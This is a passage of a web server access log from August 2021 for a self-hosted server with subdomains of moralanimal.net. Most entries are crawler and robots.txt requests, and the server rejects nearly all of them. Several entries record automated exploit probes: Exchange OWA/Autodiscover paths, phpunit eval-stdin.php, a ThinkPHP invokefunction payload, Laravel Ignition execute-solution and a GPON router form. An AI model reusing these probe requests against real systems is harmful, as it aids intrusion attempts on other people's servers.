AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [12/Aug/2021:12:14:26 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 61.135.15.183] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [12/Aug/2021:13:25:57 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 61.135.15.160] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; Pixel 1 Build/OPD2.1672) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [12/Aug/2021:13:38:09 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [12/Aug/2021:13:38:36 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:13:38:37 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:14:28:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [12/Aug/2021:14:37:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Aug/2021:14:57:26 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:14:57:26 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:16:50:35 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.215.47] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:17:01:08 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:17:01:08 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:17:01:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.115] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:17:14:48 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.207.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:17:43:08 +0000] 400 - HEAD http localhost "/" [Client 147.182.201.80] [Length 0] [Gzip -] "-" "-" [12/Aug/2021:17:43:08 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 147.182.201.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:08 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 147.182.201.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:09 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 147.182.201.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:09 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 147.182.201.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:09 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 147.182.201.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:09 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 147.182.201.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:09 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 147.182.201.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:09 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 147.182.201.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:10 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 147.182.201.80] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [12/Aug/2021:17:43:10 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 147.182.201.80] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [12/Aug/2021:17:43:10 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 147.182.201.80] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:43:10 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 147.182.201.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [12/Aug/2021:17:55:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Aug/2021:18:12:44 +0000] 444 - GET https home.moralanimal.net "/" [Client 198.204.234.253] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [12/Aug/2021:18:32:36 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:19:43:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Aug/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Aug/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Aug/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Aug/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Aug/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Aug/2021:20:42:31 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [12/Aug/2021:20:59:55 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:20:59:55 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:21:25:54 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 198.204.234.253] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [12/Aug/2021:22:15:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:23:03:18 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.94.247] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:23:17:18 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [12/Aug/2021:23:57:11 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:23:57:12 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:00:36:04 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:00:36:05 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:00:43:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Aug/2021:00:57:28 +0000] 444 - GET https localhost "/" [Client 109.248.6.120] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [13/Aug/2021:01:53:57 +0000] 444 - GET https 64.22.31.253 "//a2billing/customer/templates/default/footer.tpl" [Client 185.40.4.67] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [13/Aug/2021:02:04:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 68.183.122.126] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94" "-" [13/Aug/2021:02:20:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [13/Aug/2021:02:20:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [13/Aug/2021:03:09:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 13.57.219.129] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [13/Aug/2021:03:23:25 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:03:23:26 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:03:23:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.88.52.232] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/60.0.3099.91 Safari/537.32" "-" [13/Aug/2021:03:23:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.88.52.232] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/60.0.3099.91 Safari/537.32" "-" [13/Aug/2021:04:19:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.132.58.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [13/Aug/2021:04:19:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.132.58.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [13/Aug/2021:04:19:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.132.58.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [13/Aug/2021:04:19:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 91.132.58.42] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [13/Aug/2021:04:19:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 91.132.58.42] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [13/Aug/2021:04:19:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 91.132.58.42] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [13/Aug/2021:04:45:30 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:04:45:31 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:05:21:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.68] [Length 0] [Gzip -] "-" "-" [13/Aug/2021:06:25:55 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:25:55 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:25:57 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:25:58 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:25:59 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:26:00 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [13/Aug/2021:06:26:01 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:26:04 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:26:04 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:26:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:26:07 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Aug/2021:06:36:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [13/Aug/2021:08:00:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [13/Aug/2021:08:09:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:09:28:29 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1" "-" [13/Aug/2021:09:29:07 +0000] 400 - GET http 64.22.31.253 "/" [Client 5.8.10.202] [Length 252] [Gzip -] "fasthttp" "-" [13/Aug/2021:09:29:08 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:08 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:08 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:09 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:17 +0000] 444 - GET https 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:18 +0000] 400 - GET http 64.22.31.253 "/aaa9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:18 +0000] 444 - GET https 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:29:18 +0000] 400 - GET http 64.22.31.253 "/aab9" [Client 5.8.10.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [13/Aug/2021:09:49:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.155.104] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [13/Aug/2021:09:57:49 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 46.101.111.221] [Length 0] [Gzip -] "curl/7.3.2" "-" [13/Aug/2021:10:12:39 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.219] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:10:28:34 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:10:28:34 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:10:43:50 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.81] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [13/Aug/2021:11:10:14 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:11:10:15 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:13:21:52 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:13:21:52 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:13:35:43 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:13:35:44 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [13/Aug/2021:14:44:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [13/Aug/2021:16:14:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.56] [Length 0] [Gzip -] "-" "-" [13/Aug/2021:16:14:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.56] [Length 252] [Gzip -] "-" "-" [13/Aug/2021:16:14:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Aug/2021:16:51:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.204.152] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Aug/2021:17:00:58 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Aug/2021:17:00:58 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Aug/2021:17:00:58 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Aug/2021:17:00:58 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Aug/2021:17:00:58 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Aug/2021:17:00:58 +0000] 444 - GET https 192.168.1.12 